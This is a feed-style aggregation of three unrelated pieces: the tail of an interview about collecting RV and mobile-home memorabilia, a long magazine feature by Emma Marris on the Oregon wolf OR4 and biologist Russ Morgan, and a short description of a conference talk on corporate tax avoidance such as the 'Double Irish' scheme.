Closen: We have more of that genetic defect than most people, certainly. We collect over so many areas—we do postcards, advertising, books, and emblems—so we’ve really been bitten by the bug. But many people who do RVing or mobile-home living have a hobby that involves some sort of collecting, whether it’s the amateur radio cards or advertising from vintage magazines. There are plenty of collecting subcategories with regard to RVing and mobile homes. We just do it more broadly than most people.

The July 1960 issue of "Popular Mechanics" shows an idealized suburban family outside an elaborate mobile home. The cover story is entitled "Trailers Join the Country Club." (Via eBay)

The July 1960 issue of “Popular Mechanics” shows an idealized suburban family outside an elaborate mobile home. The cover story is entitled “Trailers Join the Country Club.” (Via eBay)

Collectors Weekly: It’s funny to think of people who are into compact living are also into collecting.

Closen: Some of it doesn’t take much room. Take postcards, for example. It’s sometimes called shoebox collecting because a 3×5 postcard is the perfect size to fit in a shoebox. You can take a standard shoebox and fit 500-1,000 postcards into it. A sizable collection of postcards can be done in a relatively small space. People tend to specialize. They collect postcards about a particular, narrow topic. Another example is matchbook covers; you can also store a lot of them in a small area.

Collectors Weekly: In the book, you also show vintage company placards or emblems that would be attached to the vehicles.

Closen: Those are tougher to get, of course, because those are permanently affixed to the coaches. But if you can find a salvage yard, you might come across a few. A lot of people have been savvy enough that if a coach has been damaged in a storm or an accident, before they let go it to the junkyard, they’ll pull off the emblems. Those things can be highly valuable. That is another field of collecting that may or may not take up a lot of space. Some of those things are large, but a lot of them are relatively small.

A vintage linen postcard of Willow Trailer Park in Long Beach promises clean palm-lined streets and a leisurely California lifestyle. (Via eBay)

A vintage linen postcard of Willow Trailer Park in Long Beach promises clean palm-lined streets and a leisurely California lifestyle. (Via eBay)

Collectors Weekly: Since you collect a broad range of objects, how do you hunt for your collectibles?

Closen: We use all the standard sources—antique stores and malls, flea markets, estate sales, and eBay. Yard sales and garage sales can sometimes have treasures about RVing and mobile homes. It’s hit and miss, but going on the hunt is part of the fun. If you go to a postcard show, the dealers have their cards alphabetized by subject—it’s absolutely remarkable. Some dealers laugh at me when I ask about RVs and mobile homes, but a lot of them have collected cards on those topics. We also go to toy stores and see if they have any modern models of RVs or mobile homes. There is a huge amount of Airstream toys and models on the market. We’ve got three or four display cases here in the house full of Airstream stuff.

This 1950s tin toy, made in Japan, features a fully detailed interior of a "house trailer." (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

This 1950s tin toy, made in Japan, features a fully detailed interior of a “house trailer.” (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Why do you think Airstream has become hip while mobile-home living is generally mocked?

Closen: The Airstream trailers were borne out of the stylish Art Deco Streamline Moderne movement. Today, no other trailer or mobile home is made like they are. Back in the ’40s and ’50s, a couple of other companies, like Spartan and Vagabond, were also building the aluminum silver-bullet airplane fuselage-looking trailers, but those companies didn’t survive. Airstream has survived, and they’re so well-made, roadworthy, and aerodynamic. When you shine them up, they’re remarkable. If you were to go to an RV dealer and look at the new ones, they are just magnificent inside—bright, clean, and well-designed. Even the 2017 model looks fantastic. The shortest, little, tiny Airstream is at least $60,000 or $70,000, while the medium and larger ones are well over a hundred thousand dollars for a trailer—often more expensive than buying a stick-built house. They’re so iconic and good-looking that the Museum of Modern Art in New York has an Airstream in its collection. We’ve written an entire book on Airstream, the only book out there on Airstream memorabilia.

Streamline was a brand of Modernist airplane-fuselage-style trailers that competed with Airstream. The line was featured in the October 1963 issue of "Trail-R-News." (Via TomPatterson.com)

Streamline was a brand of Modernist airplane-fuselage-style trailers that competed with Airstream. The line was featured in the October 1963 issue of “Trail-R-News.” (Via TomPatterson.com)

Collectors Weekly: Speaking of unconventional homes, in the book, you say houseboats are also a form of mobile homes.

Closen: We were trying to be a little cute. People have tried a lot of alternative living spaces. Years ago, Winnebago decided it was going to build a mobile home in a helicopter. You’d sit the copter down, and it had an awning you could pull out. Obviously, that was a gimmick. Yes, a houseboat can be sort of a mobile home, if it’s self-contained and has water, electric, sewage, and kitchen facilities. You see those around Seattle, San Francisco, and other waterfront communities. Today, HGTV has shows about water-living people, who build homes that sit in marinas. They can be quite expensive.

Collectors Weekly: What are the other comparable lifestyle trends today?

Closen: I’m a big fan of HGTV, and I’m seeing this tiny-house craze that’s going in San Francisco and other places. TV audiences are fascinated by all the people who are willing to try to live in 200 or 300 square feet. That was the size of my college dorm room, and when I think back on those years, I wonder, “How did I survive graduate school in that room?” In a way, we’re almost coming full circle here. A bunch of the tiny housers are living in less square footage than would’ve been available to servicemen post-World War II. Unlike the veterans, many of them have other options, but they’re choosing to live in a tiny house to embrace a simple, minimalist lifestyle. I think the tiny-house lifestyle is going to be tough for people with kids or people who want to have kids. There’s just not enough space for children in most of those homes.

The manager of Pine Shores Trailer Park in Sarasota, Florida, sent this shuffleboard postcard to entice a Maine citizen to winter there in 1949. He promised a new large bathhouse, modern laundry, improved electrical and water systems, an attractive recreation hall, and fishing. (Via eBay)

The manager of Pine Shores Trailer Park in Sarasota, Florida, sent this shuffleboard postcard to entice a Maine citizen to winter there in 1949. He promised a new large bathhouse, modern laundry, improved electrical and water systems, an attractive recreation hall, and fishing. (Via eBay)

Collectors Weekly: Why don’t they just move into mobile-home parks?

Closen: While young people are embracing the tiny-house movement, for the most part, they don’t want to adopt the trailer-park lifestyle. In the past few decades, mobile-home parks tend to be occupied by people who are older or retired. Part of that is because a lot of these people have more than one home, of course. Mobile-home living is affordable enough that you can have a home in two or three places, including a warm location near a beach.

Collectors Weekly: It strikes me that mobile-home parks have a lot of potential as singles communities.

Closen: To my knowledge, there haven’t been any organized singles mobile-home park locations. But what happens is as people age, their husband or wife passes on. So you’ve got a lot of elderly but single retired people moving into mobile-home parks in Florida and the other warm-weather places. There, some elderly people will partner up because they don’t want to live alone at that stage, and I don’t blame them. It happens all the time.

trailer_pacificpalasaides_santamonica_ebay

The Pacific Palisades Trailer Bowl near Santa Monica, California, boasts a glorious ocean view for its 174 lots. This vintage postcard talks about its adults-only community, which also offered a heated pool, shuffleboard, private phone connections, and underground utilities, including natural gas. (Via eBay)

(In addition to “Don’t Call Them Trailer Trash: The Illustrated Mobile Home Story,” Michael Closen and John Brunkowski have published six other books about RVs, trailers, and mobile homes including “Airstream Memories,” “KOA and the Art of Kamping,” “Amateur Radio Goes Camping & RVing: The Illustrated QSL Card History,” “Pictorial Guide to RVing,” “RV & Camper Toys: The History of RVing in Miniature,” and “Camper & RV Humor: The Illustrated Story of Camping Comedy.”)


A Very Old Man for a Wolf

$
0
0

It’s the nature of the wolf to travel. By age two, wolves of both sexes usually leave their birth packs and strike out on their own, sometimes covering hundreds of miles as they search for mates and new territory. Whatever the reason, when wolves move, they do it with intent—and quickly. Humans don’t know how they decide which way to go, but the choice is as important as any they’ll ever make.

One day in 2005 or 2006, a young, black-furred wolf in Idaho decided to head west. He swam across the Snake River to Oregon, which at the time was beyond the gray wolf’s established range. By entering the state, he walked out of anonymity and into a form of local celebrity, becoming notorious over the next few years for his bold raids on livestock and his enduring competence as a hunter, father, and survivor.


Download the Audm app for your iPhone to listen to more longform titles.

In Oregon, that male met another long-distance traveler from Idaho, a silver-gray female. This wolf had been collared by Idaho state biologists, who knew her as B300. She was born to the Timberline Pack, north of Idaho City, and it’s possible to trace her ancestry back to the state’s formal wolf reintroduction in 1996. Her great-grandmother was B23, a black wolf who was born in northern British Columbia and who dined as a pup on moose and caribou in the boreal forest. B23 was captured and moved in January of 1996 to Dagger Falls, in Idaho’s Frank Church River of No Return Wilderness. She would give birth to almost 30 pups before she was killed by federal wildlife officials in 2001 for killing a calf.

In the summer of 2006, when B300 was collared, she was probably already feeling restless. In September, two members of her pack were shot by wildlife officials after they killed a sheep and a dog. By late fall, she’d made the choice to strike out on her own. She too went west and crossed the Snake into territory as yet unclaimed by wolves.

The black wolf and B300 mated for the first time in December of 2006 or 2007—nobody knows when exactly. They settled in the high timber of the Wallowa Mountains, a kingdom of pines and wildflowers and cow pies that curves like a palisade around the agricultural communities of Joseph and Enterprise. They made a den inside a huge felled ponderosa and cared for their first round of pups, born blind and helpless in early spring. They were now officially a pack, the first to exist in Oregon for nearly 60 years.


The black wolf and B300 had been preceded by a few other wolves in Oregon, but they were the first to establish roots and start breeding. A male showed up in 1999, and its existence so perplexed state officials that they captured it, put it in a crate, and sent it back to Idaho. Still, everybody knew deportation wouldn’t work in the long run. Wolves were inevitably going to return.

Eventually, the Oregon Department of Fish and Wildlife (ODFW) hired a biologist to deal with this trickle of immigrants: Russ Morgan, a lifetime wildlife manager and backwoodsman based in La Grande. While the black wolf was busy slaying elk in the Wallowas to feed his new pups, Morgan was driving the back roads of eastern Oregon at night, literally howling into the dark, looking for wolves.

Morgan, now 54, is a tracker and a hunter, by trade and spiritual avocation. He grew up outside of Bend, going after lizards with a BB gun. His native ecosystem is the juniper and sage high desert of central Oregon, a beautiful place to learn the ways of nature. He would ramble all day in the bush and come home for dinner covered in juniper pitch.

For Morgan, hunting is not about killing and winning, but rather being part of what he calls “the goods and hardships of nature.” Hunting isn’t a sport for him. There’s a lot of care and focus and silence involved when he goes into the woods with a game tag. He typically hunts elk with a longbow and makes his own arrows.

Oregon is a vast territory for a solo wolf tracker, and the new pack produced two rounds of offspring before Morgan caught up with them. Each time, the pups remained in the den for a month or so, tiny and clumsy at first, then increasingly playful and bold. Their mother would stay close, nursing and minding them, even consuming their urine and feces to keep the den clean until they were big enough to go outside. Meanwhile, her mate kept her fed. Eventually, both parents would return to the hunt, bringing food back in their bellies, which they’d throw up as a steamy stew for the pups to eat—a technique biologists call “regurgitative provisioning.”

By three months, the pups were ready to learn the basics of hunting from their parents and older siblings. By nine months, the most adventurous were ready to leave. Others might stay with the family for up to four or five years, helping hunt and care for younger siblings before deciding to strike out on their own. In essence, a wolf pack is a family, often with aunts, uncles, grandparents, and multiple generations of pups worked into the mix.

In 2009, a field team of fish biologists doing a stream survey sent Morgan a cell phone recording of barking and howling. Morgan knew wolf sounds when he heard them, so he drove to the site and started tracking the pack’s prints and scat. Before long, he was able to trap the gray female and collar her with a VHF radio transmitter. Idaho’s B300 became Oregon’s OR2. Now Morgan could monitor the pack from the comfort of his truck, driving around Wallowa County with a portable receiver.

The 2 in OR2 means she was the second wolf collared in Oregon. A male designated OR1, who had a companion—probably a sibling—had been collared in eastern Baker County a few months earlier. When the duo began killing livestock—slaughtering at least 20 sheep in one night—and didn’t respond to deterrents like a collar-activated noise box, the ODFW decided they had to be destroyed.

At this point, decisions about hunting down a wolf were entirely the prerogative of the agency. So Morgan made the call, guided by an ODFW document called the Wolf Conservation and Management Plan, a bureaucratic blueprint that codified how this newly returned symbol of all things wild was to be handled in a landscape of cattle, timber, rock climbers, rivers thick with rafts, and hikers.

About a month after OR2 got her new name and collar, she and the black male, along with their pups, were eating an elk carcass that lay partially submerged in a minor stream called Grouse Creek, about ten miles from Hells Canyon—the especially deep river gorge that separates Oregon and Idaho. Wolves keep to the high ground, as a rule; Morgan calls them “ridge walkers.” But their long, drawn-out pursuits tend to follow gravity downhill, and a lot of prey end up in the bottom of a valley or draw, exhausted, wet, and doomed.

Morgan and a friend hiked down to the creek and saw what Morgan describes as “a whole wad of wolves blowing out.” The female and the pups fled, but the big male stopped 30 yards away from the carcass and turned to face them, howling, barking, and growling. He was black as a starless night and in the prime of his youth.

“He just lit up,” Morgan recalls. “He was so loud you couldn’t hear yourself think.” Morgan pulled out his digital camera and took a few pictures. The wolf ran off.

Man and wolf would meet many times. Sometimes Morgan would count his pups. Sometimes he would chase him with a rifle loaded with tranquilizers, other times with a rifle loaded with bullets. Over the next seven years, they would start turning gray together.


Six months after their first meeting, on February 12, 2010, the black male got a collar and a name. Morgan used the signal from OR2 to track the family by helicopter. When he found the wolves, he had to try and pick the alpha male out of a half-dozen adult-sized wolves coursing through the rocky defiles of Road Canyon in lower Grouse Creek, just a few miles from the elk site. It was easy enough to spot OR2, and she had a companion running beside her, keeping close. Morgan figured he’d found his alpha.

Wolves are so fast—they can do bursts of 38 miles per hour, ten faster than Usain Bolt—that Morgan’s helicopter pilot struggled to keep up, while Morgan, leaning out the door, tried desperately to get a clear shot at the alpha’s rump. Suddenly, the big black wolf tripped over brush and rolled in a somersault. When he righted himself, he sat down and started barking and howling at the chopper, inadvertently concealing his backside.

wolf
OR4, the Imnaha wolf pack's alpha male, after being refitted with a working GPS collar on May 19, 2011. (ODFW)

“When he flipped over, I could see the rotor wash flattening his hair,” Morgan says. “He was frustrated. He gets pretty frustrated when he is being chased.” Finally, the wolf stood and Morgan got a shot off. Darted, the animal slowed, sat, and then went to sleep in the snow. The terrain was too steep to land, so the pilot dipped into the ravine, where Morgan stepped out with his kit. The helicopter took off, and Morgan shared a moment with the unconscious alpha. As he weighed him—115 pounds, the largest wolf ever recorded in Oregon—took blood samples, and affixed tags and a collar, the black wolf officially became OR4, a wild animal with a name. A wild animal with his DNA on file.

OR2 wasn’t happy about any of it. She stood a couple hundred yards away while Morgan worked, howling continuously.


The Wallowa Valley, cradled by mountains, was once the home of the Wallowa band of the Nez Percé, and one of its two principal communities is Joseph, named after Chief Joseph, or Hinmatówyalahtqit—Thunder Rises as it Goes. There’s a statue of Chief Joseph in town, and there’s a rodeo named after him, but his descendants are based out of the Colville Indian Reservation in eastern Washington, with the members of 11 other tribes. They were forced to move by the U.S. Army in 1877 so white men could raise livestock here.

“We were like deer. They were like grizzly bears,” Chief Joseph wrote in his autobiography. “We had a small country. Their country was large. We were contented to let things remain as the Great Spirit Chief made them. They were not; and would change the rivers and mountains if they did not suit them.”

The white men built roads, mines, and mills; they divvied up leased federal land for grazing. Today, a quarter of the jobs in Wallowa County are in agriculture or timber, and much of the work involves running cattle or growing hay. During the first few decades of the 20th century, ranchers eradicated the grizzly bear and wolf to make the land safe for livestock. The last known griz was spotted in the western Wallowa Mountains in 1938. The last wolf bounty paid out in Oregon was in 1947.

Sixty years isn’t such a long time—it’s the average age of a Wallowa County rancher—yet perhaps the return of wolves to Oregon would have gone over better if it had taken 200. As it was, only a couple of generations had passed. To the children and grandchildren of the old wolf slayers, reintroduction seemed like an insult. “It tells them that their heritage was wrong,” Morgan says, “that it was a mistake to make those wolves go away.”

wolf
Russ Morgan on a tour of OR4's old stomping grounds. (Emma Marris)

So OR4 was already on the wrong side of the local ranching community, just by existing. It didn’t help when he and other members of the pack—called the Imnaha pack, after the Imnaha River at the core of their territory—were drawn closer to the world of man by bone piles.

Most ranches have bone piles, or dead piles, which are central locations for piling up the carcasses of dead livestock, since burial requires using heavy machinery. By 2010, the Imnaha wolves were lingering at these places, playing with hides, chewing on leg bones, and generally luxuriating in the cozy atmosphere of decaying mammals. And then they started to look around at the placid creatures on the hoof nearby, so much less dangerous to pursue than elk, which can break a wolf’s jaw or rib with a muscular kick.

OR4 and OR2 had what was probably their third litter of pups in April of 2010. There were at least four. These arrivals joined roughly eight other offspring, now all full-sized and actively hunting. The family was getting big.

Data from Yellowstone suggests that every wolf will kill, on average, two elk per month in the winter. Each elk is generally taken down by two or three wolves. Wolves’ teeth are surprisingly blunt instruments; they often kill by inducing massive internal bleeding. A cougar pounces on its prey and kills it instantly by breaking its neck or slicing open a carotid artery, but a wolf chases an animal until it collapses, then basically beats it to death with its jaws.

Once the elk is down, the wolves unzip it, and first eat the heart, lungs, liver, intestines, spleen, and kidneys. Then they get to work on the meaty legs. Each wolf requires at least seven pounds of food per day, so a good-sized pack needs to kill an elk every two or three days.

Keeping up with this pace of consumption demands endurance. One day in the spring of 2010, when OR4 was in his prime, he killed an elk 33 miles from his den and then ran home in six hours, his belly full of meat to throw up to feed his pups. That meant a 66-mile round trip in rough country—with a vigorous elk hunt in the middle.

In the spring and summer, when the snow has melted and elk have left the hills, wolves diversify their diets, eating deer, rodents, and whatever else they can get. Pickings are slim, except down in the valleys, near all those irresistible bone piles. In early spring, when the pups are hungry, much of the game is found in lowland pastures, sharing grass with cattle. The pack killed its first calf on May 6, 2010. By the end of May, five were dead.

But just as the ODFW began handing out permits to local ranchers allowing them to shoot stock-killing wolves on sight—and calling the U.S. Agriculture Department’s Wildlife Services, the agency that specializes in killing vermin and problem predators—the pack changed its tactics and retreated to the mountains. Everything got quiet for a while. OR4’s collar went dead. The snows came and went. More pups were born.

The next year, in May of 2011, the pack—now totaling about 15—started killing calves again, and the ODFW decided to kill two members to reduce the number of mouths OR4 had to feed. ODFW staffers set out traps and went on the hunt with guns. One of OR4’s sons was trapped and killed; a daughter was shot.

By this time, Morgan knew OR4’s own distinctive paw print: the wolf’s left hind foot had a broken toe that stuck out 90 degrees. Morgan found this print and set a trap directly on top of it. As he thought might happen, OR4 himself was caught. Because he was the breeding male, his life was spared, but Morgan took the opportunity to knock him out with a “jab pole”—a tranquilizer on a stick—and outfit him with a working collar, this one equipped with GPS. The state of Oregon began to download OR4’s whereabouts four times a day.

For the next five years, the ODFW often knew exactly where he was, to within 100 meters. But there were gaps, because OR4 was very hard on collars. He probably banged them against rocks and logs during chases, maybe took an occasional elk hoof right in the neck. Some of his collars didn’t last a month.


In an attempt to pacify angry ranchers across the West, the conservation group Defenders of Wildlife established a fund in 1987 to compensate producers who lost animals to wolves—but only if a state agency ruled that the death was clearly caused by one. Later, the state of Oregon set up its own fund.

Morgan was integral to this system. He started posting official reports of his depredation investigations after local ranchers began to contest his findings. OR4’s file grew thicker and thicker. Over time, as the workload got to be too much, Morgan took on an assistant: Roblyn Brown, a methodical, capable field biologist with a passion for advanced data analysis. She became his heir apparent as wolf coordinator.

Sometimes, the kills Morgan was called out on were old, especially when the victims were animals out grazing on public land. One report reads: “The carcass had been mostly consumed by scavengers, with sign of wolves, bear, and coyote present. The carcass consisted mostly of bones and a large piece of hide, with muscle remaining for examination only on the head, neck, and lower legs.”

This kill was ruled “probable wolf” because of the cow’s location in a dry rocky creek bottom. There were signs that it had been chased downhill, and purple bruising on the carcass indicated hemorrhaging under the skin before death—from those crushing, blunt teeth.

Sometimes the kills were fresh, the evidence overwhelming. One morning in December of 2012, a rancher heard the alarm sound on a telemetry receiver that Morgan had given him, to alert him when OR4 was in the area. But he didn’t need the box. He could hear the wolves howling, and when he found a dead cow, it was still warm. It had run for a half-mile before being taken down, and Morgan noted “blood and rumen smears on the ground, blood stains on the vegetation, hair tufts, muscle fibers, and vegetation and soil disturbances.” He ruled it a confirmed wolf kill.

Some deaths were mysteries, like this one from September of 2011: “Carcass was mostly intact; there was no sign of injury (broken bones) or marks on the outside of the cow. Maggots were present in large numbers. There was scavenging (coyote tracks were present) on the right side of the head and around anus. There was no evidence of a predator attack. The cause of death of the cow is unknown, but unrelated to predation.”

No matter what Morgan found, and despite the fact that wolf losses represented a tiny fraction of livestock mortality, the ranchers stayed angry. This took a toll. Morgan would come home from work to his partner, Dana, a wildfire emergency coordinator who’s now his wife, eat dinner, make some arrows, go to sleep, and head back to work the next morning without speaking a word.

Morgan didn’t just investigate depredations; he orchestrated a multi-pronged deterrence campaign. He outfitted ranchers with alert systems linked to OR4’s collar, so they could defend their livestock. He spent many a day and night up on a hill in the valley with the telemetry setup, so they could haze wolves heading into the valley. In 2010, he started working to do away with bone piles. Today, the Wallowa County landfill takes cattle carcasses for free.

Despite his efforts, in the fall of 2011, OR4 and his family killed once too often, a calf taken down near Griffith Creek on private land. It belonged to Todd Nash, the Oregon Cattlemen’s Association wolf committee chairman and a longtime opponent of wolf reintroduction.“Blood from the calf was scattered over a large area both inside and outside an old broken-down corral,” the report read. “Within the corral were multiple areas of blood, hair tufts, and sign that the calf had gone down (and then back up) at least once before its death.”

GPS data placed OR4 at the scene. According to the wolf plan, chronically depredating wolves were to be killed, even though wolves were still on the state endangered species list. Though the vast majority of the food OR4 was eating was wild game, he was killing stock often enough that “chronic” seemed like the appropriate adjective. He had to go.


When Morgan applied to be Oregon’s wolf coordinator, he had already been a wildlife manager for 20 years. He’d captured cougars and counted fish and blocked development that threatened a rare ground squirrel. He knew wolves would be controversial. But he believed in the wolf plan—a document that doesn’t do one thing that many environmentalists wished it would: take on the institution of grazing on public lands. This practice is as hot a potato as you can find in the West, up there with who gets water and how much timber to cut. The ODFW Commission, which wrote the plan, explains in the preamble that it has no authority over grazing issues. The overall goal was “to ensure the conservation of gray wolves as required by Oregon law while protecting the social and economic interests of all Oregonians.” It aimed to be a compromise. “Non-lethal and lethal control activities actually may promote the long-term survival of the wolf by enhancing tolerance,” the commission wrote. Put another way: the price of having wolves is killing wolves.

It was this plan that Morgan now carried out. Using the coordinates from OR4’s collar, he determined that the wolf was hunkered down in a thick stand of small pines, not far from a forest road, probably waiting out a rain shower. Morgan put his rifle on a bipod uphill from the stand and sent Brown around the back to flush the wolves toward him. He heard movement—wolves approaching. He rotated his head to scan down the face of the pines, and when he looked back, OR4 was standing right in front on him, completely exposed. But the wolf didn’t stay still long.

“Just as I was getting the crosshairs on him, he vanished,” Morgan says.

Brown emerged from the pines and they set up for another try, getting ahead of the collar signal, which was now moving down a canyon. It was drizzling and cloudy. Morgan had kind of a “sick feeling” as they sat there, then Brown checked her phone. There was a text message: “Stand down. Judge has issued a stay.”

Three environmental groups had sued to stop the ODFW from killing OR4. Their central claim was that the state could not legally kill an animal on the Oregon endangered species list. They also convinced the Oregon Court of Appeals to issue an emergency stay while their suit went forward. A stay like this has to be based on some “irreparable harm” that will occur if it’s not put in place; since wolves don’t have legal standing, it was granted in part to prevent irreparable harm to the members of the three environmental groups, who would be denied “the ‘profound and exhilarating’ experience of viewing wolves in the wild, including the particular wolves targeted for killing.”

wolf
OR2, the longtime mate of OR4. (ODFW)

Morgan is a believer in the idea that wild animals must be managed as populations. “I try not to get emotionally involved with particular individuals,” he says. “If that wolf had come out in a place where we could have pulled the trigger, we would have pulled the trigger. You have to focus on the task at hand and get it done, desensitize yourself. One of the things we’re thinking is that wolves are going to be OK in Oregon, and this is part of management. It is what we signed up for when we did the wolf plan.”

With OR4 and his pack safe for the time being, Morgan continued to investigate depredations and tried to keep a working collar on his alpha. Life went on. OR4’s pups grew up and left home. One of his sons, OR7, traveled all the way to California in December of 2011, briefly becoming an international celebrity. Another, OR9, went to Idaho and was shot by a hunter with an expired wolf tag. A third, OR33, was found shot to death near Klamath Falls, Oregon, in April 2017. A fourth, OR12, took over the remote Wenaha pack in 2012 and is still the breeding male there.

A fifth, OR3, disappeared in 2011 and was presumed dead. But in the summer of 2015, he showed up on a trail camera in Klamath County, hundreds of miles to the southwest. He found a mate, and they had a single pup. When the pup was about six months old, a poacher killed OR3’s mate. Now the father and son are believed to live together near Silver Lake, in Lake County.

As for OR4, in March of 2012, he was tranquilized from a helicopter again and re-collared. Every spring, new pups were born; every year, older offspring dispersed. The pack dined mostly on elk, but occasionally on calves.

In May of 2013, the lawsuit that prompted the stay on OR4’s death sentence ended with a settlement agreement among the environmental groups, the state, and the Oregon Cattlemen’s Association. New rules were incorporated into the wolf plan. The threshold for killing a wolf was explicitly spelled out, and it would get lower and lower as the wolf population expanded. While there were still fewer than four breeding pairs in the state, they would be managed under “Phase One” rules: a wolf could be killed if a pack was implicated in four depredations within six months and if non-lethal control attempts had already been tried.

After these changes were in place, the Imnaha pack somehow skirted the line, never quite taking enough livestock to earn a death sentence. Ranchers joked that the wolves kept a copy of the settlement posted inside the den.


A few months after the settlement, OR2’s collar went dead. She was never seen again. In February of 2014, OR4 got his fourth collar. Every time he was darted from the air, he seemed smarter. It was getting harder and harder to bring him down.

“We—humans—collar lots of animals,” Morgan says. “Mostly because we are trying to learn. We collar wolves for a different reason—because we are fearful. We want to keep track of them. That is fundamentally different than trying to understand them.”

By 2014, OR4 was an old wolf, largely gray. His teeth were worn. He had sired more than 30 pups. OR2 was gone, and he was now seen with a female that had an obvious limp. Yet he carried on.

And then, in January of 2015, the rules changed again. Annual counts indicated that there were officially enough wolf breeding pairs in Oregon for the wolf plan to move to a new phase. Now, the ODFW could authorize lethal control at a the request of a property owner or rancher with a permit to graze on public land after just two depredations in a row.

This time, the Imnaha pack got on the wrong side of the rules in a hurry. In the spring of 2016, the pack—now down to four animals—killed a 500-pound steer calf in the Upper Swamp Creek area. The same day it happened, Brown saw OR4 and his mate, nicknamed Limpy, from a helicopter over the Zumwalt Prairie, a favorite hunting ground. Neither wolf had a working collar, so she loaded up her rifle with a tranquilizer dart.

OR4 didn’t run. Two years earlier, Brown had collared him and he ran across the ground “like the wind.” Now he just loped across the landscape, turned, and barked twice.

Brown pulled the trigger ruefully. She and Morgan had talked about their reluctance to collar OR4 again, but with the animal in sight, her duty was to act. No wolf in the pack was collared. He was right there. Later, when Morgan got a text from Brown that OR4 had been fitted with his fifth collar, his heart sank. The noose was tightening.

A few weeks after the new collar went on, the pack killed a ram. Then a calf. And then another. And then another ram. At this point, they had blown past the minimum depredations for lethal control. On March 25, 2016, the ODFW received an official request from a rancher to have them killed.

On March 31, Morgan, his bosses at the ODFW, and his staff held a meeting. The consensus was that the rash of depredations and collar signals from the valley floor suggested that an aging OR4 was going after easy targets and would probably continue to do so. It was even possible that a younger and stronger wolf had pushed him out of his core territory. It was clear to everyone that, under the wolf plan, OR4, his mate, and two offspring that made up his current pack had to go. Morgan made the official recommendation.

“It is not retribution or justice,” Morgan says of the decision. “It is solving a problem.”

OR4’s ancestors didn’t ask to be relocated to the lower 48. And while gray wolves have arguably restored a lost component to western ecosystems, they returned to a place much changed—a place full of people, of fat hornless cattle, of snack-sized sheep, of rubber bullets and range riders and firecrackers and helicopters and tranquilizers and traps and collars and GPS signals and government regulations. OR4 never failed as a wolf. He broke human rules. And in the 21st century, being a competent wolf isn’t enough to stay alive. You must also—impossibly—know your place.

Since there were already ODFW staff in the area with a helicopter, Morgan left it to them to kill the wolves. OR4 was old; his mate was limping; they had fresh GPS collars transmitting their whereabouts. It wasn’t hard to find them. ODFW staff herded them out of a steep drainage canyon, thick with timber, into the open. The young wolves split off, and neither of them had collars, so the crew pursued them first. Once they were both dead, the staff relocated OR4 and Limpy. The pair ran from the helicopter, their speed limited by the female’s injury. The people hunting them down were firing buckshot loads. They flew directly above the wolves and shot each one in the head. Within two hours of the official decision, the entire pack was gone.

OR4 was probably a month shy of his 11th birthday—a very old man for a wolf.


The wolves’ bodies were collected. OR4 was still heavy, his head robust, rounded, and gray. “You could tell he was an older, dominant-type wolf,” says the man who carried him, who asked not to be identified. They were loaded into a cargo net and taken back by helicopter. Next, the carcasses were displayed to the local sheriff—a protocol put in place because of the lack of trust between the state agency and local authorities, and a ritual Morgan found repellent. Then staffers brought the dead wolves back to the ODFW offices in La Grande. All their collars and tags were removed.

A backhoe was used to dig a grave for the four wolves. But first, Morgan collected OR4’s skull. Wolf skulls, bones, and pelts are often collected for research and education. In this case, Morgan also believed the skull of such a historically important wolf should be preserved at the ODFW headquarters in Salem. For him, saving it is a deep mark of respect.

After OR4 was killed, Morgan got a condolence note from Todd Nash. It read: “I will have to admit, I was hoping OR4 would die of old age. After all, he was just a wolf trying to make a living, and I admired that.”

Nash didn’t hate the wolf. He hated the reintroduction effort. KPIC Channel 4 of Roseburg, Oregon, called him for a response to the killing. “We spend so much money trapping, collaring, and helicopter guarding, and one thing and another,” he told the reporter. “Then they end up killing the darn things. Because we can’t coexist with them. That’s the plain and simple fact. This pack should have been removed a long time ago.”

OR4 was a dominant leader, a skilled hunter, and an excellent father, according to Morgan. Seven of the state’s 17 packs have alphas that are his sons, daughters, or granddaughters. OR4's descendants also founded California’s first wolf pack since the 1920s—the Shasta pack. Above all else, the big black wolf was supremely competent. “He epitomizes all things wolf,” Morgan says.

A few days after OR4 was killed, Morgan’s partner, Dana, went to the hospital with a blood clot in her shoulder. As he sat with her, Morgan’s heart began racing. A passing doctor took a listen and hustled him into the emergency room. It wasn’t a heart attack, just some kind of transitory tachycardia. Doctors told him to avoid stress.

After a few months spent mostly at his desk, working on a revision of the wolf plan, Morgan retired on September 15, 2017. He described himself as being “tired of the negativity and heartache that is wolf management in a modern world.”

Brown has taken over as acting wolf coordinator. On her computer screen is a map of the most recent whereabouts of the 15 or so collared wolves in the state of Oregon, like a flight-control display for Canis lupus.

On Morgan’s last outing into the field before his retirement, he visited the den that belonged to OR4. The den itself is a huge ponderosa pine log, hollow from one end to the other. At one time, 15 wolves would have called this place home. On this summer day, the clearing was still.

Morgan pulled out a coarse gray wolf hair snagged on the log. There was some old scat still among the lupines and wild strawberries, and a sprinkling of bleached bones. “I don’t have any remorse for killing them, but I am sad they aren’t here,” he said.

Before he left, he picked up an elk skull from the clearing. He placed it firmly in the center of the den’s opening. And then he walked away.

Emma Marris (@emma_marris) is the author of Rambunctious Garden: Saving Nature in a Post-Wild World. This story was supported by a grant from the Institute for Journalism and Natural Resources. Marris lives in Klamath, Oregon. 

Illustration by Molly Mendoza (@msmollym)

Taxation – Explaining What a Double Irish Sandwich Is

$
0
0
media.ccc.de - Taxation

vavoida

Taxation, the most "boring" #34c3 talk, but hey it's the economy stupid, and you pay for it! We will a provide a quick overview of the international taxation system. Explaining what a Double Irish Sandwich is. Why international corporations like Google only pays 2.4% taxes. And how your favourite tech companies (Google, Amazon, Apple, Microsoft, ... ) evaded billions in taxes. This tax-dodging costs the European Union more than $50 billion. Annually. We bring this numbers into perspective. And why you pay more.
And how you should discuss that topic, since it defines how our society will be.

You might heard about #LuxLeaks, #PanamaPapers, or other frivilous tax activites. This talk gives a overview about one the most urgend policy issues legal tax holes for big corporation, how big their score is, in relation to your own tax rate (across Europe) and why it should concern you. Duh you pay for it. And why you should get active. We will present the launch of a European-wide anti-tax evasion campaign beginning of May 2017.

Ireland's decision to phase out the Double Irish tax loophole doesn't mean the country is giving up on tax competition, or that U.S. multinationals will now bring more of their foreign earnings home. The reason affected tech companies are so calm about it is that they know Ireland will do whatever it takes to keep them. And it's not just Ireland ...

